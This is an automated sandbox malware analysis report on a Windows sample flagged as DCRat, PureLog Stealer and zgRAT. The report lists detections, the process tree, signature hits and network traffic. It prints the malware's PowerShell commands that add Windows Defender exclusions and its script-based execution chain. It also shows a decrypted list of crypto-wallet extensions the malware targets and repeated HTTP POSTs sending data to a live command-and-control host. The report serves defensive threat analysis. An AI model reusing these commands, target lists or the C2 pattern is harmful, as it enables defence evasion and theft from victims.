Edit tour

Windows Analysis Report
gkcQYEdJSO.exe

Overview

General Information

Sample name:	gkcQYEdJSO.exe renamed because original name is a hash value
Original sample name:	b5a1474fcb8f7b9809d52546bd304af3.exe
Analysis ID:	1576406
MD5:	b5a1474fcb8f7b9809d52546bd304af3
SHA1:	8604fe586fa0d03adaa6608169a62c65c837de7d
SHA256:	dc83dbd12c5a432a6c168982e55d6c7be89dd0bc4b915e3e93e3a97c8af0ab0d
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Creates processes via WMI

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious execution chain found

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

gkcQYEdJSO.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\gkcQYEdJSO.exe" MD5: B5A1474FCB8F7B9809D52546BD304AF3)

wscript.exe (PID: 7380 cmdline: "C:\Windows\System32\WScript.exe" "C:\Bridgecontainerserver\VBxKsR3W5qREBSxxvIt5VpzoFdFFANtbsRk6NDfKSHeOxN7UsJds5Ck.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Bridgecontainerserver\SlMo.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

BrokerhostNet.exe (PID: 7844 cmdline: "C:\Bridgecontainerserver/BrokerhostNet.exe" MD5: 0F91548CA49C64D6A8CD3846854F484C)

powershell.exe (PID: 8044 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8060 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Bridgecontainerserver\BrokerhostNet.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7340 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 8164 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qcUpJGnph9.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2692 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 5776 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe (PID: 1704 cmdline: "C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe" MD5: 0F91548CA49C64D6A8CD3846854F484C)

BrokerhostNet.exe (PID: 5800 cmdline: C:\Bridgecontainerserver\BrokerhostNet.exe MD5: 0F91548CA49C64D6A8CD3846854F484C)

BrokerhostNet.exe (PID: 3164 cmdline: C:\Bridgecontainerserver\BrokerhostNet.exe MD5: 0F91548CA49C64D6A8CD3846854F484C)

XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe (PID: 5592 cmdline: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe MD5: 0F91548CA49C64D6A8CD3846854F484C)

XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe (PID: 416 cmdline: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe MD5: 0F91548CA49C64D6A8CD3846854F484C)

svchost.exe (PID: 7596 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
gkcQYEdJSO.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
gkcQYEdJSO.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Bridgecontainerserver\BrokerhostNet.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Bridgecontainerserver\BrokerhostNet.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1757730379.0000000006D62000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000018.00000002.3019985347.0000000002E28000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000018.00000002.3019985347.0000000003102000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000003.1756904306.0000000006465000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000007.00000000.1996952451.0000000000762000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.2033284427.0000000012E07000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: BrokerhostNet.exe PID: 7844	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe PID: 5592	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe PID: 1704	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
7.0.BrokerhostNet.exe.760000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
7.0.BrokerhostNet.exe.760000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.gkcQYEdJSO.exe.64b370a.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.gkcQYEdJSO.exe.64b370a.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.gkcQYEdJSO.exe.64b370a.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.gkcQYEdJSO.exe.64b370a.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.gkcQYEdJSO.exe.6db070a.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.gkcQYEdJSO.exe.6db070a.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.gkcQYEdJSO.exe.6db070a.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.gkcQYEdJSO.exe.6db070a.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Bridgecontainerserver/BrokerhostNet.exe", ParentImage: C:\Bridgecontainerserver\BrokerhostNet.exe, ParentProcessId: 7844, ParentProcessName: BrokerhostNet.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe', ProcessId: 8044, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Bridgecontainerserver/BrokerhostNet.exe", ParentImage: C:\Bridgecontainerserver\BrokerhostNet.exe, ParentProcessId: 7844, ParentProcessName: BrokerhostNet.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe', ProcessId: 8044, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Bridgecontainerserver\VBxKsR3W5qREBSxxvIt5VpzoFdFFANtbsRk6NDfKSHeOxN7UsJds5Ck.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Bridgecontainerserver\VBxKsR3W5qREBSxxvIt5VpzoFdFFANtbsRk6NDfKSHeOxN7UsJds5Ck.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\gkcQYEdJSO.exe", ParentImage: C:\Users\user\Desktop\gkcQYEdJSO.exe, ParentProcessId: 7336, ParentProcessName: gkcQYEdJSO.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Bridgecontainerserver\VBxKsR3W5qREBSxxvIt5VpzoFdFFANtbsRk6NDfKSHeOxN7UsJds5Ck.vbe" , ProcessId: 7380, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Bridgecontainerserver/BrokerhostNet.exe", ParentImage: C:\Bridgecontainerserver\BrokerhostNet.exe, ParentProcessId: 7844, ParentProcessName: BrokerhostNet.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe', ProcessId: 8044, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7596, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T00:07:49.062914+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49736	104.21.38.84	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: gkcQYEdJSO.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://749858cm.renyash.ru/javascriptrequestApiBasePrivate.php	Avira URL Cloud: Label: malware
Source: http://749858cm.renyash.ru/	Avira URL Cloud: Label: malware
Source: http://749858cm.renyash.ru	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\qcUpJGnph9.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Bridgecontainerserver\VBxKsR3W5qREBSxxvIt5VpzoFdFFANtbsRk6NDfKSHeOxN7UsJds5Ck.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\uznrhtzR.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\cnLmOXeC.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\pXxtswpF.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\foddJTjY.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb

Multi AV Scanner detection for dropped file

Source: C:\Bridgecontainerserver\BrokerhostNet.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\Desktop\BxbrKIuG.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\QARGDIci.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\WFKNZreq.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\cnLmOXeC.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\foddJTjY.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\pXxtswpF.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\utIZHXKr.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\uznrhtzR.log	ReversingLabs: Detection: 70%

Multi AV Scanner detection for submitted file

Source: gkcQYEdJSO.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\NcCXpyPJ.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\WFKNZreq.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\aQOwrfcH.log	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\uznrhtzR.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BxbrKIuG.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\pXxtswpF.log	Joe Sandbox ML: detected
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: gkcQYEdJSO.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000007.00000002.2033284427.0000000012E07000.00000004.00000800.00020000.00000000.sdmp	String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"}}
Source: 00000007.00000002.2033284427.0000000012E07000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-jYA8BnJN4l5GER9R0Xjc","0","","","5","2","WyIyIiwie1NZU1RFTURSSVZFfS9Vc2Vycy97VVNFUk5BTUV9L0FwcERhdGEvTG9jYWwvVGVtcC8iLCI1Il0=","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]

Source: gkcQYEdJSO.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: gkcQYEdJSO.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: gkcQYEdJSO.exe
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3065183190.000000001C2BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 3E1F1BD.loggntkrnlmp.pdb source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3065183190.000000001C2BD000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_00DCA69B
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_00DDC220

Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 104.21.38.84:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1728Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 130776Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
